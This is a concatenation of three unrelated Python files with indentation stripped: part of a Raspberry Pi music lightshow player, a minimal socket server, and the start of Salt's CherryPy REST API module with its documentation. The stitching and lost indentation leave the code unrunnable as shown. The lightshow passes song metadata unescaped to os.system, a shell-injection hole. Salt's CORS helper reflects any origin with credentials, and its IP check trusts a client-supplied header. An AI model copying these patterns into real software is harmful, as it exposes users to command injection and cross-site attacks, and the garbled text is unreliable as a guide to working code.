self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if args.readcache:
# Read in cached fft
try:
# compare configuration of cache file to current configuration
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if not self.cache_found:
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
raise IOError()
else:
# load cache from file using numpy loadtxt
self.cache_matrix = np.loadtxt(self.cache_filename)
# get std from matrix / located at index 0
self.std = np.array(self.cache_matrix[0])
# get mean from matrix / located at index 1
self.mean = np.array(self.cache_matrix[1])
# delete mean and std from the array
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
log.debug("std: " + str(self.std) + ", mean: " + str(self.mean))
except IOError:
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
msg = "Cached sync data song_filename not found: '"
log.warn(msg + self.cache_filename + "'. One will be generated.")
def save_cache(self):
"""
Save matrix, std, and mean to cache_filename for use during future playback
"""
# Compute the standard deviation and mean values for the cache
mean = np.empty(cm.hardware.gpio_len, dtype='float32')
std = np.empty(cm.hardware.gpio_len, dtype='float32')
for pin in range(0, cm.hardware.gpio_len):
std[pin] = np.std([item for item in self.cache_matrix[:, pin] if item > 0])
mean[pin] = np.mean([item for item in self.cache_matrix[:, pin] if item > 0])
# Add mean and std to the top of the cache
self.cache_matrix = np.vstack([mean, self.cache_matrix])
self.cache_matrix = np.vstack([std, self.cache_matrix])
# Save the cache using numpy savetxt
np.savetxt(self.cache_filename, self.cache_matrix)
# Save fft config
self.fft_calc.save_config()
cm_len = str(len(self.cache_matrix))
log.info("Cached sync data written to '." + self.cache_filename + "' [" + cm_len + " rows]")
log.info("Cached config data written to '." + self.fft_calc.config_filename)
def get_song(self):
"""
Determine the next file to play
:return: tuple containing 3 strings: song_filename, config_filename, cache_filename
:rtype: tuple
"""
play_now = int(cm.get_state('play_now', "0"))
song_to_play = int(cm.get_state('song_to_play', "0"))
self.song_filename = args.file
if args.playlist is not None and args.file is None:
most_votes = [None, None, []]
songs = cm.get_playlist(args.playlist)
for song in songs:
if len(song[2]) > 0:
if len(song[2]) >= len(most_votes[2]):
most_votes = song
if most_votes[0] is not None:
log.info("Most Votes: " + str(most_votes))
current_song = most_votes
# Update playlist with latest votes
for song in songs:
if current_song[0:3] == song[0:3] and len(song) == 3:
song.append("playing!")
# Update playlist file
cm.write_playlist(songs, args.playlist)
else:
# Get a "play now" requested song
if 0 < play_now <= len(songs):
current_song = songs[play_now - 1]
# Get random song
elif cm.lightshow.randomize_playlist:
current_song = songs[random.randrange(0, len(songs))]
# Play next song in the lineup
else:
if not (song_to_play <= len(songs) - 1):
song_to_play = 0
current_song = songs[song_to_play]
if (song_to_play + 1) <= len(songs) - 1:
next_song = (song_to_play + 1)
else:
next_song = 0
cm.update_state('song_to_play', str(next_song))
# Get filename to play and store the current song playing in state cfg
self.song_filename = current_song[1]
cm.update_state('current_song', str(songs.index(current_song)))
self.song_filename = self.song_filename.replace("$SYNCHRONIZED_LIGHTS_HOME", cm.home_dir)
filename = os.path.abspath(self.song_filename)
self.config_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".cfg"
self.cache_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".sync"
if cm.lightshow.songname_command:
metadata = mutagen.File(self.song_filename, easy=True)
            if metadata is not None:
if "title" in metadata:
now_playing = "Now Playing " + metadata["title"][0] + " by " + metadata["artist"][0]
os.system(cm.lightshow.songname_command + " \"" + now_playing + "\"")
def play_song(self):
"""Play the next song from the play list (or --file argument)."""
# get the next song to play
self.get_song()
# load custom configuration from file
self.load_custom_config()
# Initialize Lights
self.network.set_playing()
hc.initialize()
# Handle the pre/post show
play_now = int(cm.get_state('play_now', "0"))
self.network.unset_playing()
if not play_now:
result = PrePostShow('preshow', hc).execute()
if result == PrePostShow.play_now_interrupt:
play_now = int(cm.get_state('play_now', "0"))
self.network.set_playing()
# Ensure play_now is reset before beginning playback
if play_now:
cm.update_state('play_now', "0")
play_now = 0
# setup audio file and output device
self.setup_audio()
# setup our cache_matrix, std, mean
self.setup_cache()
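        # Rolling buffer of recent FFT matrices; light updates are taken from
        # self.light_delay chunks back so they can lag the audio output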
matrix_buffer = deque([], 1000)
        # Process the audio file
row = 0
data = self.music_file.readframes(self.chunk_size)
if args.createcache:
total_frames = self.music_file.getnframes() / 100
counter = 0
percentage = 0
while data != '':
# Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
data = self.music_file.readframes(self.chunk_size)
if counter > total_frames:
percentage += 1
counter = 0
counter += self.chunk_size
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename,
percentage))
sys.stdout.flush()
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename, 100))
sys.stdout.flush()
data = ''
self.cache_found = False
play_now = False
print "\nsaving sync file"
while data != '' and not play_now:
# output data to sound device
self.output(data)
# Control lights with cached timing values if they exist
matrix = None
if self.cache_found and args.readcache:
if row < len(self.cache_matrix):
matrix = self.cache_matrix[row]
else:
log.warning("Ran out of cached FFT values, will update the cache.")
self.cache_found = False
if matrix is None:
# No cache - Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > self.light_delay:
matrix = matrix_buffer[self.light_delay]
self.update_lights(matrix)
            # Read next chunk of data from the music file
data = self.music_file.readframes(self.chunk_size)
row += 1
# Load new application state in case we've been interrupted
cm.load_state()
play_now = int(cm.get_state('play_now', "0"))
if not self.cache_found and not play_now:
self.save_cache()
# Cleanup the pifm process
if cm.fm.enabled:
self.fm_process.kill()
# check for postshow
self.network.unset_playing()
if not play_now:
PrePostShow('postshow', hc).execute()
# We're done, turn it all off and clean up things ;)
hc.clean_up()
def network_client(self):
"""Network client support
If in client mode, ignore everything else and just
read data from the network and blink the lights
"""
log.info("Network client mode starting")
print "Network client mode starting..."
print "press CTRL<C> to end"
hc.initialize()
print
try:
channels = self.network.channels
channel_keys = channels.keys()
while True:
data = self.network.receive()
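                # data[0] is either a single pin number (int) with its
                # brightness in data[1], or an array of per-channel levels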
if isinstance(data[0], int):
pin = data[0]
if pin in channel_keys:
hc.set_light(channels[pin], True, float(data[1]))
continue
elif isinstance(data[0], np.ndarray):
brightness_levels = data[0]
else:
continue
for pin in channel_keys:
hc.set_light(channels[pin], True, brightness_levels[pin])
except KeyboardInterrupt:
log.info("CTRL<C> pressed, stopping")
print "stopping"
self.network.close_connection()
hc.clean_up()
def launch_curses(self, screen):
self.terminal.init(screen)
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
if __name__ == "__main__":
lightshow = Lightshow()
# Make sure one of --playlist or --file was specified
if args.file is None and args.playlist is None:
print "One of --playlist or --file must be specified"
sys.exit()
if "-in" in cm.lightshow.mode:
lightshow.audio_in()
elif lightshow.client:
lightshow.network_client()
else:
lightshow.play_song()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print("[NEW CONECTION] {addr} connected.")
connected = True
while connected:
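        # Each message is preceded by a fixed-size header of HEADER bytes that
        # holds the length of the message body as a decimal string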
        msg_length = conn.recv(HEADER).decode(FORMAT)
        if not msg_length:
            break  # client closed the connection without sending a header
        msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
        if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9, 2017.7.3, Oxygen
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: Oxygen
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
        that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
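    As an illustrative sketch that combines several of the options above (the
    certificate and filesystem paths are placeholders, not defaults):
    .. code-block:: yaml
        rest_cherrypy:
          port: 8000
          ssl_crt: /etc/pki/tls/certs/localhost.crt
          ssl_key: /etc/pki/tls/certs/localhost.key
          static: /srv/salt-api/static
          app: /srv/salt-api/index.html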
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
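For comparison, here is a sketch of the same job-cache lookup sent as JSON
(reusing the session cookie from the examples above), which avoids the
urlencoded caveats entirely:
.. code-block:: bash
    curl -sSik https://localhost:8000 \\
        -b ~/cookies.txt \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "runner", "fun": "jobs.lookup_jid", "jid": "20150129182456704682"}]'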
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running async jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
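As a rough sketch of the asynchronous pattern described above (reusing the
session cookie from the earlier examples), a job can be started and its return
fetched later from the job cache:
.. code-block:: bash
    # Start the job and note the jid in the response
    curl -b ~/cookies.txt -sS localhost:8000 \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'
    # Fetch the return for that jid from the job cache
    curl -b ~/cookies.txt -sS localhost:8000/jobs/<jid> \\
        -H 'Accept: application/x-yaml'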
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
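For example, a sketch of raising both values in the master config (the numbers
are illustrative, not recommendations):
.. code-block:: yaml
    rest_cherrypy:
      port: 8000
      thread_pool: 200
      socket_queue_size: 60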
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
import yaml
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
    .. versionadded:: 2016.3.0
    Verifies user requests against the API whitelist (user/IP pairs)
    in order to provide whitelisting for the API similar to the
    master, but over the API.
    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
    success_str = ("[api_acl] Authentication successful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
